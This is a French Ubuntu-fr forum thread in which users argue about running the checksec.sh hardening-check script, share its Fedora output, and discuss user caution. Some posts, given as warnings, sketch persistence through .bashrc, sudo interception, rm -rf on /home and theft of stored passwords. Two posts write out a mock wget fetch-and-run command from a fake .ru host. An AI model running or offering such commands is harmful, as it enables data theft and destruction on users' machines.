Venez tester la sécurité de votre système GNU/Linux !

Grünt · Le 24/10/2010, à 16:39

helly a écrit :

On sais où ce situe la plus grosse faille de sécurité, c'est dommage que ce script ne le mette pas en évidence !

Il pourrait: une vérification dans ".bash_history" pour voir si l'utilisateur a fait un cat, less, more, vi, vim ou emacs sur le script avant de l'exécuter. Et si c'est pas le cas, il affiche un gros 'PEBCAK!"

helly · Le 24/10/2010, à 16:48

Ça serait une bonne chose je pense anéfé !

Кຼزດ · Le 24/10/2010, à 16:50

ǤƦƯƝƬ a écrit :

helly a écrit :
On sais où ce situe la plus grosse faille de sécurité, c'est dommage que ce script ne le mette pas en évidence !
Il pourrait: une vérification dans ".bash_history" pour voir si l'utilisateur a fait un cat, less, more, vi, vim ou emacs sur le script avant de l'exécuter. Et si c'est pas le cas, il affiche un gros 'PEBCAK!"

Ben non, ça me l'afficherait quand même, vu que j'utilise zsh…

helly · Le 24/10/2010, à 16:54

Oui enfin, dans l'idée, chipotte pas  !

pierrecastor · Le 24/10/2010, à 17:00

Ha, moi j'ai juste fait clique droit, ouvrir avec gedit.

Ca marche aussi ?

helly · Le 24/10/2010, à 17:05

Nan, paske utiliser gnome, c'est déjà une preuve de pebcak .
(troll extrême, à ne pas prendre au sérieux !)

Dernière modification par helly (Le 24/10/2010, à 17:05)

Compte anonymisé · Le 24/10/2010, à 18:51

J'ai passé l'après-midi à lire des extraits de "Cool Memories" de Jean Baudrillard, une oeuvre très moderne qui prend totalement en compte l'univers informatique et virtuel dans lequel nous vivons.

Et il y a une réflexion de ce philosophe qui m'a " interpellé" (comme on dit) :

"Plus un système se rapproche de la perfection, plus il se détruit lui-même. L'enfermement du réseau succède à l'enfermement carcéral et l'excès de sécurité accroît le danger. "

Baudrillard reprend en fait une réflexion de Hölderlin qui dit : "Là où grandit le danger croît aussi ce qui sauve.C'est dans l'excès de sécurité qu'est le péril extrême."

D'un côté rationnel et pragmatique, je suis conscient d'avoir été un peu stupide d'exécuter hier soir une ligne de code sans réflexion ni prudence préalables.

Mais c'est aussi la contrepartie d'une forme de spontanéité, de curiosité (et de confiance aussi, à savoir : le sentiment que sur un forum comme celui d'Ubuntu, l'auteur d'un pareil topic ne pouvait qu'être honnête et crédible dans son intention de partage d'autant plus qu'il était supposé être en temps réel sous le regard critique et la surveillance d'autres intervenants aussi motivés et experts) auxquelles je tiens en tant qu'utilisateur du Libre.

Finalement, je ne regrette pas du tout de m'être lancé avec spontanéité, curiosité et fraîcheur, même si ça aurait été nuisible pour mon système : parce qu'il m'aurait fallu alors réparer et réparer c'est aussi s'activer, sortir du ron-ron quotidien et apprendre de ses erreurs.

Par ailleurs, et pour en revenir à la réflexion de Baudrillard appliquée par moi à présent à Linux et sa réputation de sécurité : bon, d'abord tant mieux si Linux est apprcécié pour sa réputation de sécurité considérée comme supérieure à ses concurrents.

Mais ce serait triste que nous nous devrions nous y sentir toujours en sécurité comme dans une bulle à l'abri de tout : cela pourrait correspondre à une forme d'endormissement et de mort auréolée de paranoïa sénile. Nous ne saurions plus vraiment comment nous défendre en cas d'attaque concertée.

D'autant plus que (et même si c'est un autre sujet...) je demeure persuadé que cette excellence en matière de sécurité n'est que provisoire, étant due en assez grande partie au fait que nous soyons très peu nombreux à utiliser ce système sur Terre...

Le jour où 3 milliards d'individus utiliseront Linux, ce sera une autre histoire...

Dernière modification par Checky (Le 24/10/2010, à 19:05)

Sir Na Kraïou · Le 24/10/2010, à 20:21

Le concept d'excès de sécurité qui affaiblit les libertés, c'est un lieu commun assez vieux (B. Franklin par exemple). Mais on peut retourner ta remarque Là où grandit le danger croît aussi ce qui sauve : si la sécurité, c'est le flic, l'État, tout ça… ce qui sauve, c'est la sécurité de ton système, l'absence de faille et ta propre méfiance.

En fait, je pense à ce genre d'article : http://bugbrother.blog.lemonde.fr/2010/ … /#more-819
Les gentils flics de la dgse sont là pour protéger le brave citoyen, non ?

Le gentil flic qui protège les bons citoyens du grand méchant loup a écrit :

"Si le méchant utilise un tunnel VPN (Réseau privé virtuel permettant de sécuriser les communications, NDLR) chiffré en 256 bits, on n'arrivera pas à le casser; mais s'il utilise Windows avec plein de failles, on s'y introduit, et on change son VPN en 40 bits (bien plus facile à casser, lui, NDLR)"

Je trouve que ça montre assez bien en quoi la sécurité du système est plus ce qui sauve (contre le danger, l'excès de sécurité) que l'excès de sécurité en lui-même.

L'article souligne bien les failles humaines (toujours les mêmes mots de passe, par exemple) dues à l'absence de paranoïa. Et ça ne vole pas très haut, pour moi, un gus qui met le même mot de passe sur son compte msn et sur ses activités terroristes, ou qui utilise Windows et un vpn, c'est un gus qui fait des erreurs de débutants, d'autant qu'il y a des guides pour dire comment être parano, le boulot est déjà mâché (comment survivre à un bust, par exemple). Quand on sera trois millions à utiliser Linux, je pense que la clef de voute de la sécurité sera toujours l'utilisateur.

Dans le genre, même un script sans droits root peut voir et faire pas mal de choses sur un système, non ? Dans l'absolu, je me doute que ce script particulier n'a pas de raisons d'être malsain, mais on n'apprend pas à être parano le jour où on en a besoin. Et puis en fait, je soulignais juste l'aspect amusant, de gens qui exécutent un script pour contrôler leur sécurité et avouent ensuite sans problème ne pas avoir compris ce que ça faisait.

Grünt · Le 24/10/2010, à 21:09

Р☢w ! ✰

✰ (эй !) a écrit :

Dans le genre, même un script sans droits root peut voir et faire pas mal de choses sur un système, non ?

Il peut tourner en background, se lancer automatiquement via les fichiers .xinit et .bashrc (ou équivalent) chaque fois que l'utilisateur se connecte (y compris après redémarrage), et intercepter les commandes "su" et "sudo" afin de passer root de façon transparente.

Compte anonymisé · Le 24/10/2010, à 21:12

Р☢w ! ✰

✰ (эй !) a écrit :

Le concept d'excès de sécurité qui affaiblit les libertés, c'est un lieu commun assez vieux

Ce n'est pas la question de l'affaiblissement de la liberté à laquelle je pensais en faisant ce rapprochement.

Ce n'est même pas du tout ce que j'entendais.

Ce que j'entendais c'est que l'excès de sécurité pourrait conduire à l'enfermement dans une bulle sanitaire qui rendrait Linux aussi fragile que les Indiens d'Amérique au moment de l'arrivée des copains de Christophe Colomb et de leurs virus : et on sait ce que ça a donné.

Ce que j'entendais c'est qu'il est bon d'être confronté à des risques pour apprendre justement à s'en défendre, c'est ainsi qu'on s'immunise et qu'on se vaccine.

Et ce que je pense, en poussant la réflexion à fond, c'est que le concept de sécurité complète en matière informatique est une totale illusion : au fond, tout est pénétrable parce que tout est sous contrôle, et c'est le Big Brother le plus puissant du moment qui mène la danse (les States sont les maîtres du Net).

Tout cela étant dit, et pour ramener les choses à une dimension plus quotidienne et banale, je fais partie des gens qui savent être aussi prudents mais je n'imaginerai pas une seule seconde que notre système de distribution libre puisse être totalement infaillible, et pas seulement du fait d'une erreur qui serait mienne (ou nôtre...)

Et tant mieux parce qu'en cas de pépin intrusif, c'est ainsi que l'on pourra évaluer une nécessaire capacité de résistance et de survie.

Tout cela étant dit , j'apprécie aussi ce soir d'avoir le sentiment que tout baigne , que mon système n'a pas été visité et j'apprécie l'impression qu'il me donne d'être sain...

Dernière modification par Checky (Le 24/10/2010, à 21:13)

Heliox · Le 24/10/2010, à 21:41

Bah, moi j'aurais réagi comme Checky, j'aurais tendance à faire confiance aux membres du forum Ubuntu-fr, pourvu que le membre en question soit inscrit depuis pas mal de temps (info donnée par son profil) et que son nom me dise quelque chose, que je l'aie déja vu dans différentes discussions faire preuve d'une certaine intelligence ou maturité dans son discours. Et que le script en question soit bien "fait" (bien expliqué, documenté, et déja testé par d'autres personnes). Après j'ai peut-être tort.

Après c'est évident que vous pouvez ne pas avoir confiance en moi. J'ai donc essayé d'expliquer ce que j'y ai compris, j'ai donné le lien d'origine (de Linuxfr), et j'ai même posté les résultats du script sur mon propre PC. Si j'avais eu un pépin, je vous l'aurais dit et je ne l'aurais pas partagé (j'ai toujours un coup d'œil sur les logs système).

Enfin bref, je ne continuerai pas la polémique, je la laisse aux interessée. Et puis ceux qui ne veulent pas executer ce script sont dans leur droit.

Et je donnerai donc les résultats (étonnants) de Fedora 14 en Beta que j'ai eu sur LiveCD :

* System-wide ASLR (kernel.randomize_va_space): On (Setting: 2)
Description - Make the addresses of mmap base, heap, stack and VDSO page randomized.
This, among other things, implies that shared libraries will be loaded to random
addresses. Also for PIE-linked binaries, the location of code start is randomized.
See the kernel file 'Documentation/sysctl/kernel.txt' for more details.
* Does the CPU support NX: Yes
         COMMAND    PID RELRO             STACK CANARY           NX/PaX        PIE
 gnome-keyring-d   1761 Permission denied
* Kernel protection information:
Description - List the status of kernel protection mechanisms. Rather than
inspect kernel mechanisms that may aid in the prevention of exploitation of
userspace processes, this option lists the status of kernel configuration
options that harden the kernel itself against attack.
Kernel config: /boot/config-2.6.35.6-46.fc14.x86_64
Warning: The config on disk may not represent running kernel config!
  GCC stack protector support:            Enabled
  Strict user copy checks:                Disabled
  Enforce read-only kernel data:          Enabled
  Restrict /dev/mem access:               Enabled
  Restrict /dev/kmem access:              Enabled
* grsecurity / PaX: No GRKERNSEC
The grsecurity / PaX patchset is available here:
http://grsecurity.net/
* Kernel Heap Hardening: No KERNHEAP
The KERNHEAP hardening patchset is available here:
https://www.subreption.com/kernheap/

Le script n'autorise pas le test des processus lancé, drôle de protection, SELinux ?

Dernière modification par Heliox (Le 24/10/2010, à 21:46)

Koshie-2.0 · Le 25/10/2010, à 03:35

ǤƦƯƝƬ a écrit :

Р☢w ! ✰ ✰ (эй !) a écrit :
Dans le genre, même un script sans droits root peut voir et faire pas mal de choses sur un système, non ?
Il peut tourner en background, se lancer automatiquement via les fichiers .xinit et .bashrc (ou équivalent) chaque fois que l'utilisateur se connecte (y compris après redémarrage), et intercepter les commandes "su" et "sudo" afin de passer root de façon transparente.

Oh plus simple… Un rm -rf sur le /home ? Copier discrètement les données présentes sur le /home avec rsync… Récupérer les favoris ainsi que les sites visiter avec son navigateur (qui a dit Skype ?)… Et pire, certains client IM et IRC gardent dans un dossier «caché» (mais non chiffré) le mot de passe des comptes (pidgin, irssi, poezio…).

Dans mon cas, utilisant mon mot de passe de client IM pour parfois autre choses (que je ne citerai pas ) il suffit de le récupérer en zyeutant certains fichiers puis d'en zyeuter d'autre pour savoir quel site je visite (GMail par exemple ?)… Et j'en passe. On peut très facilement récupérer l'ensemble de la vie privée de quelqu'un et des données sensibles avec un script de ce genre, ou je dis de la merde ?

C'est pour ça que premièrement j'ai demandé à Ubuntu de chiffrer mon /home (en cas de vol un live CD / USB suffit pour tout récupérer…) et qu'ensuite je n'exécute pas n'importe quoi sur mon système.

Ce n'est pas de la paranoïa, c'est de la prévention. L'informatique est désormais trop complexe et diversifié pour se permettre de se laisser aller je trouve.

GrainChieux · Le 25/10/2010, à 08:52

Prudence , OUI .
Parano , NON .

La prudence implique la conscience alors que la parano signifie la peur.
Et ce n'est pas un hasard si les sociétés totalitaires et sarkozy ( cherchez le troll ) cherchent à instiller cette dernière.

EDIT : et la peur est antinimique de la conscience et de la connaissance.

Dernière modification par GrainChieux (Le 25/10/2010, à 08:54)

tooguy66 · Le 29/10/2010, à 02:23

Mais, finalement cette commande c'est du hacking? c'est a mettre avec les commandes dangereuses?

MdMax · Le 29/10/2010, à 09:36

Р☢w ! ✰

✰ (эй !) a écrit :

Euh… Y a des gens, ici, qui téléchargent et exécutent un script qu'ils ne comprennent pas, pour vérifier la sécurité de leur système ? Oo' J'sais où est la plus grosse faille, moua…

+1

Demain quelqu'un viendra proposer des commandes de ce style:

wget http://jetepiquetesdonnees.ru/...
sudo...

Et une bonne partie des lecteurs vont suivre les instructions à la lettre sans se poser de question. Les malwares ont un grand avenir avec ce genre de comportement.

Les protections testées ici sont peut-être sympa, mais le plus important est le conducteur. Tiens pour tester votre ceinture et votre airbag, foncez dans ce mur à 110 km/h pour voir.

Ne faites pas confiance aux membres du forum Ubuntu-fr. Aujourd'hui vous avez eu de la chance avec un gars qui n'avait aucune mauvaise intention. Demain un autre viendra et vous ne remarquerez peut-être même pas qu'il vient de s'inscrire pour piéger des gens, avant le passage des modérateurs.

Il se peut également que quelqu'un pirate trapkit.de et remplace ces scripts par des commandes beaucoup plus néfastes pour vos données ou votre système.

pierrecastor · Le 29/10/2010, à 13:12

Donc en partant de cette logique, il ne faudrait rien télécharger en se basant sur le wiki d'ubuntu, et ne pas rajouter de dépôts non plus ?

MdMax · Le 29/10/2010, à 13:53

Il faut juste se poser les bonnes questions... est-ce qu'un site ou un dépôt est digne de confiance ? Dans le libre on a un énorme avantage: à condition d'avoir du temps, on peut lire les sources et recompiler soi-même un utilitaire avant de l'utiliser, et si vous ne pouvez rien trouver sur la réputation d'un site ou d'un dépôt, abstenez-vous de l'utiliser si vous n'êtes pas certain de ce que vous faites (genre tester la chose sur un système démarré sur votre clé USB plutôt que de mettre en péril votre disque dur et vos données).

Et pour tester la sécurité sur son système, Ubuntu-fr propose déjà une page accessible aux débutants:
http://doc.ubuntu-fr.org/securite

Si vous avez un doute ou manquez de connaissances, limitez-vous à ce qui est écrit dans les documentations proposées par votre distribution. Ces documentations sont maintenues et mises à jour avec amour par toute une communauté.

Dernière modification par MdMax (Le 29/10/2010, à 13:55)

pierrecastor · Le 29/10/2010, à 13:58

Et comment je sais qu'un petit malin n'a pas changer le wiki pour transformer un dépôt digne de confiance en méchant dépôts plein de saletés ?

MdMax · Le 29/10/2010, à 15:11

pierrecastor a écrit :

Et comment je sais qu'un petit malin n'a pas changer le wiki pour transformer un dépôt digne de confiance en méchant dépôts plein de saletés ?

On peut aller super loin comme ça, mais au moins maintenant tu te poses les bonnes questions. Tu sais qu'il y a un risque, et donc tu testeras le truc un support de test (par exemple un boot sur clé USB) avant d'exposer ça à tes données sensibles, ou à des données que tu n'aurais pas encore sauvegardé.

Heliox · Le 29/10/2010, à 15:47

MdMax a écrit :

pierrecastor a écrit :
Et comment je sais qu'un petit malin n'a pas changer le wiki pour transformer un dépôt digne de confiance en méchant dépôts plein de saletés ?
On peut aller super loin comme ça, mais au moins maintenant tu te poses les bonnes questions. Tu sais qu'il y a un risque, et donc tu testeras le truc un support de test (par exemple un boot sur clé USB) avant d'exposer ça à tes données sensibles, ou à des données que tu n'aurais pas encore sauvegardé.

+1 pierrecastor,
@MdMax, même si tes recommandations ne sont pas fausses, faut pas tomber dans l'excès de parano non plus.
Le script ne sort pas d'un coin sombre du Web :
http://abcdelasecurite.free.fr/info/ind … hecksec.sh
http://linuxfr.org/2010/03/02/26532.html

La distribution Linux "Tin hat", dérivée de "hardened Gentoo" et conçue pour ne laisser aucunes données récupérable sur la machine en cas d'attaque physique, intègre le script checksec.sh

Et j'aurais tendance à faire davantage confiance à Linuxfr qu'au Wiki Ubuntu-fr...

Et ce script a même été testé (va voir les commentaires des liens donnés).

C'est pas si je me ramenais avec un message du genre :

Dark Heliox a écrit :

Salu
Un srcipt tro bien pour testez la securite de votre ordi, ATENTION RESULTAS SURPENANS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!
faie vite ça dans l'invite de commende :
wget http://http://jetepiquetesdonnees.ru/test-securite.sh && ./test-securite.sh
a+ lé amies

tooguy66 a écrit :

Mais, finalement cette commande c'est du hacking? c'est a mettre avec les commandes dangereuses?

Mais non, plusieurs personnes l'ont exécuté et n'ont pas de problèmes (moi compris).
GentooUser, dit avoir "zieuté" le contenu du script avant de l'avoir lui même executé.
Ce script regarde juste les options de sécurité du noyau et autres dans des fichiers de config, faut pas s'alarmer.
Donc après tu l'exécutes si tu veux. Mais si tu es sous Ubuntu ou Debian ou encore Fedora, l'intérêt est maintenant limité. Le but de ce script est de voir si des protections (qui sont activées mises en place lors de la compilation d'un paquet) sont présentes dans telle ou telle distribution. Donc nos systèmes sont basés sur (globalement) les mêmes paquets, il suffit de regarder les résultats correspondants à ta distribution pour voir de quelles protections tu bénéficies

Dernière modification par Heliox (Le 29/10/2010, à 15:50)

tooguy66 · Le 29/10/2010, à 15:54

En fait je l'avais effectué bien avant ............. C'est clair que l'utilisateur est le plus gros problème. Le mieux, c'est peut-être d'encourager les gens à effectuer des sauvegardes de leurs données sur des périphériques externes, parce que failles de sécurité ou problèmes matériels la réinstallation pur et dur c'est toujours la meilleure soluce selon moi

MdMax · Le 29/10/2010, à 15:59

Heliox, je ne mets pas du tout en cause le script que tu proposes, mais simplement l'attitude qui consiste à essayer ce qui est posté sur un forum sans se méfier. C'est cette attitude qui fera qu'on aura de plus en plus de gens victimes de malwares, même sur des OS qui offrent une sécurité par défaut plus élevée que certains OS propriétaires.

Et ce n'est pas de la parano, un simple constat. Le succès des botnets et leur puissance s'explique en partie par les failles lamentables de certains systèmes, mais surtout aussi par l'attitude des utilisateurs qui vont même jusqu'à désactiver des sécurités ou taper des mots de passe, pour des choses souvent assez futiles.

love2hate · Le 29/10/2010, à 16:23

Sinon un peut lecture sur le meme sujet mwr info security

lien en anglais !

tooguy66 · Le 29/10/2010, à 18:59

J'ai voulu aller sur le lien et j'ai eu droit a une alerte de WOT. Site a une mauvaise réputation

love2hate · Le 29/10/2010, à 20:13

heu pas problème cher moi avec chromium enfin tu fais bien de l'indiqué .

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#26 Le 24/10/2010, à 16:39

Re : Venez tester la sécurité de votre système GNU/Linux !

#27 Le 24/10/2010, à 16:48

Re : Venez tester la sécurité de votre système GNU/Linux !

#28 Le 24/10/2010, à 16:50

Re : Venez tester la sécurité de votre système GNU/Linux !

#29 Le 24/10/2010, à 16:54

Re : Venez tester la sécurité de votre système GNU/Linux !

#30 Le 24/10/2010, à 17:00

Re : Venez tester la sécurité de votre système GNU/Linux !

#31 Le 24/10/2010, à 17:05

Re : Venez tester la sécurité de votre système GNU/Linux !

#32 Le 24/10/2010, à 18:51

Re : Venez tester la sécurité de votre système GNU/Linux !

#33 Le 24/10/2010, à 20:21

Re : Venez tester la sécurité de votre système GNU/Linux !

#34 Le 24/10/2010, à 21:09

Re : Venez tester la sécurité de votre système GNU/Linux !

#35 Le 24/10/2010, à 21:12

Re : Venez tester la sécurité de votre système GNU/Linux !

#36 Le 24/10/2010, à 21:41

Re : Venez tester la sécurité de votre système GNU/Linux !

#37 Le 25/10/2010, à 03:35

Re : Venez tester la sécurité de votre système GNU/Linux !

#38 Le 25/10/2010, à 08:52

Re : Venez tester la sécurité de votre système GNU/Linux !

#39 Le 29/10/2010, à 02:23

Re : Venez tester la sécurité de votre système GNU/Linux !

#40 Le 29/10/2010, à 09:36

Re : Venez tester la sécurité de votre système GNU/Linux !

#41 Le 29/10/2010, à 13:12

Re : Venez tester la sécurité de votre système GNU/Linux !

#42 Le 29/10/2010, à 13:53

Re : Venez tester la sécurité de votre système GNU/Linux !

#43 Le 29/10/2010, à 13:58

Re : Venez tester la sécurité de votre système GNU/Linux !

#44 Le 29/10/2010, à 15:11

Re : Venez tester la sécurité de votre système GNU/Linux !

#45 Le 29/10/2010, à 15:47

Re : Venez tester la sécurité de votre système GNU/Linux !

#46 Le 29/10/2010, à 15:54

Re : Venez tester la sécurité de votre système GNU/Linux !

#47 Le 29/10/2010, à 15:59

Re : Venez tester la sécurité de votre système GNU/Linux !

#48 Le 29/10/2010, à 16:23

Re : Venez tester la sécurité de votre système GNU/Linux !

#49 Le 29/10/2010, à 18:59

Re : Venez tester la sécurité de votre système GNU/Linux !

#50 Le 29/10/2010, à 20:13

Re : Venez tester la sécurité de votre système GNU/Linux !

Pied de page des forums